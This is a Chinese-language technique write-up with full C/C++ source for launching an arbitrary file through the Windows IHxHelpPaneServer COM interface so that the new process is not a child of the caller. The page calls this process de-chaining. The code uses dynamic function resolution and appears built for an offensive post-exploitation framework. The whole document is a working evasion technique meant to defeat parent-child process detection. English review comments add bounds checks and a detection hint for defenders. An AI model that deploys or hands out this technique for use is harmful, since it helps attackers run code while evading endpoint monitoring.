利用COM接口实现进程断链执行.md

实现原理

IHxHelpPaneServer是Windows的帮助和支持服务的一部分,它提供了一系列方法用于显示帮助内容、执行搜索等功能。关键点在于其中的Execute方法,这个方法原本设计用来启动与帮助文档相关的程序或脚本,但它也可以被利用来执行任意命令或程序

代码思路

1.定义COM接口

定义一个COM接口IHxHelpPaneServer,此接口包括一个Execute方法用于执行程序。DEFINE_GUID宏用于定义接口的ID,这是后续创建COM对象时需要的

// Hand-declared vtable for the IHxHelpPaneServer COM interface (no SDK header
// is included for it). Because calls go through the raw pointer returned by
// CoCreateInstance, the declaration order fixes which vtable slot each call
// hits and must not be changed. Only Execute is invoked by the code on this
// page; the three Display* entries appear to exist to occupy the preceding
// slots -- confirm against the server's actual interface before using them.
struct IHxHelpPaneServer : public IUnknown {
    virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
    // Receives a "file://" URL (built by the caller); the server opens it.
    virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
};

// Interface ID (IID) of IHxHelpPaneServer, passed as the riid argument of
// CoCreateInstance. This is distinct from the server's class ID (CLSID), which
// the code parses from a string at runtime.
DEFINE_GUID(IID_IHxHelpPaneServer, 0x8cec592c, 0x07a1, 0x11d9, 0xB1, 0x5E, 0x00, 0x0D, 0x56, 0xBF, 0xE6, 0xEE);

2.创建IHxHelpPaneServer接口实例

首先使用CoInitializeEx函数初始化COM库

调用IIDFromString函数将字符串格式的GUID转换为GUID结构体,这个GUID结构用于描述COM对象的类型,也就是类ID

获取到类ID和接口ID后,使用CoCreateInstance函数创建IHxHelpPaneServer接口的实例

// Initialise COM on this thread (apartment-threaded). The result is stored
// but, in this excerpt, never checked.
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

// Parse the server's CLSID from its string form into ClassHxHelpPaneServerc.
// NOTE(review): the return value is not checked; on failure the GUID contents
// cannot be relied on and CoCreateInstance below would be called with them.
IIDFromString(L"{8CEC58AE-07A1-11D9-B15E-000D56BFE6EE}", &ClassHxHelpPaneServerc);

// Instantiate the server and request its IHxHelpPaneServer interface.
HRESULT hr = CoCreateInstance(ClassHxHelpPaneServerc, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (void**)&IPaneServer);

3.执行程序

通过构造file://开头的路径字符串,调用IHxHelpPaneServer接口的Execute方法执行指定的文件

// Build "file://<path>" in a fixed MAX_PATH buffer. NOTE(review): wcscpy and
// wcscat perform no bounds check, so any path longer than MAX_PATH - 8 wide
// characters overruns FiletoExecute; the caller must reject such input.
wchar_t FiletoExecute[MAX_PATH];
wcscpy(FiletoExecute, L"file://");
wcscat(FiletoExecute, path);

// Hand the URL to the COM server, which performs the launch; the outcome is
// reported through the returned HRESULT.
hr = IPaneServer->Execute((LPWSTR)FiletoExecute);

完整代码

// Hand-declared vtable for the IHxHelpPaneServer COM interface (no SDK header
// is included for it). Calls go through the raw pointer returned by
// CoCreateInstance, so the declaration order fixes which vtable slot each
// call hits and must not be changed. Only Execute is invoked by
// HelpPaneServerDeChaining; the three Display* entries appear to exist to
// occupy the preceding slots -- confirm against the server's actual interface.
struct
    IHxHelpPaneServer : public IUnknown {
    virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
    virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
    // Receives a "file://" URL built by the caller; the server opens it.
    virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
};

// Local stand-in for DEFINE_GUID: unconditionally emits an initialised,
// C-linkage IID definition (no INITGUID switch). NOTE(review): the Windows
// SDK's guiddef.h defines a macro of the same name; if both are visible in
// one translation unit the later definition wins and the compiler warns about
// a macro redefinition -- confirm the include order in the actual build.
#define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
        EXTERN_C const IID name \
                = { l, w1, w2, { b1, b2,  b3,  b4,  b5,  b6,  b7,  b8 } }

// Interface ID (IID) of IHxHelpPaneServer, passed as the riid argument of
// CoCreateInstance. The server's class ID (CLSID) is a separate GUID that
// HelpPaneServerDeChaining parses from a string at runtime.
DEFINE_GUID(IID_IHxHelpPaneServer, 0x8cec592c, 0x07a1, 0x11d9, 0xB1, 0x5E, 0x00, 0x0D, 0x56, 0xBF, 0xE6, 0xEE);

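// Opens `path` through the Windows help-pane COM server: the server's Execute
// method is handed a "file://" URL and it performs the launch.
// The page calls this "process de-chaining": since the launch is done by the
// COM server rather than by this process, the new process is presumably not a
// child of the caller -- confirm with process-tree telemetry. Defenders
// correlating on ancestry should therefore look at process creations by the
// COM server host rather than at this process's children.
//
// path: NUL-terminated wide path of the file to open. "file://" + path must
//       fit in MAX_PATH wide characters; longer input is rejected (the
//       original copied it unchecked into a fixed-size buffer).
// Side effects: initialises/uninitialises COM on the calling thread and
//       reports the outcome through print_msg / print_error.
VOID HelpPaneServerDeChaining(wchar_t* path)
{
	DFR_LOCAL(OLE32, CoInitializeEx);
	DFR_LOCAL(OLE32, IIDFromString);
	DFR_LOCAL(OLE32, CoCreateInstance);
	DFR_LOCAL(OLE32, CoUninitialize);
	DFR_LOCAL(MSVCRT, wcslen);
	DFR_LOCAL(MSVCRT, wcscpy);
	DFR_LOCAL(MSVCRT, wcscat);

	// wcslen(L"file://"); kept as a constant so the bound below is exact.
	const size_t prefixLen = 7;

	if (path == NULL)
	{
		print_error("[-] No path supplied.");
		return;
	}

	// Bounds check: the unchecked wcscpy/wcscat pair overran FiletoExecute
	// for any path longer than MAX_PATH - 8 wide characters.
	if (wcslen(path) + prefixLen + 1 > MAX_PATH)
	{
		print_error("[-] Path too long : max %u characters.", (unsigned int)(MAX_PATH - prefixLen - 1));
		return;
	}

	// S_FALSE (COM already initialised on this thread) still needs the
	// matching CoUninitialize; genuine failures (e.g. RPC_E_CHANGED_MODE)
	// must not be balanced, so leave before touching COM at all.
	HRESULT hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
	if (FAILED(hr_init))
	{
		print_error("[-] CoInitializeEx failed : 0x%08x", (unsigned int)hr_init);
		return;
	}

	GUID ClassHxHelpPaneServerc;
	IHxHelpPaneServer* IPaneServer = NULL;

	// CLSID of the help-pane server; the interface ID is the static
	// IID_IHxHelpPaneServer. A parse failure must not reach CoCreateInstance.
	HRESULT hr = IIDFromString(L"{8CEC58AE-07A1-11D9-B15E-000D56BFE6EE}", &ClassHxHelpPaneServerc);
	if (FAILED(hr))
	{
		print_error("[-] IIDFromString failed : 0x%08x", (unsigned int)hr);
	}
	else
	{
		hr = CoCreateInstance(ClassHxHelpPaneServerc, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (void**)&IPaneServer);
		if (FAILED(hr))
		{
			print_error("[-] CoCreateInstance failed : 0x%08x", (unsigned int)hr);
		}
	}

	if (SUCCEEDED(hr) && IPaneServer != NULL)
	{
		// Length was validated above, so the copy/concat cannot overrun.
		wchar_t FiletoExecute[MAX_PATH];
		wcscpy(FiletoExecute, L"file://");
		wcscat(FiletoExecute, path);

		hr = IPaneServer->Execute(FiletoExecute);

		if (SUCCEEDED(hr))
		{
			print_msg("[+] Succeed Create Process.");
		}
		else
		{
			// COM reports failure in the HRESULT; GetLastError() is not set
			// by these calls, so the original printed an unrelated value.
			print_error("[-] Failed Create Process : 0x%08x", (unsigned int)hr);
		}

		IPaneServer->Release();
	}

	CoUninitialize();
}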
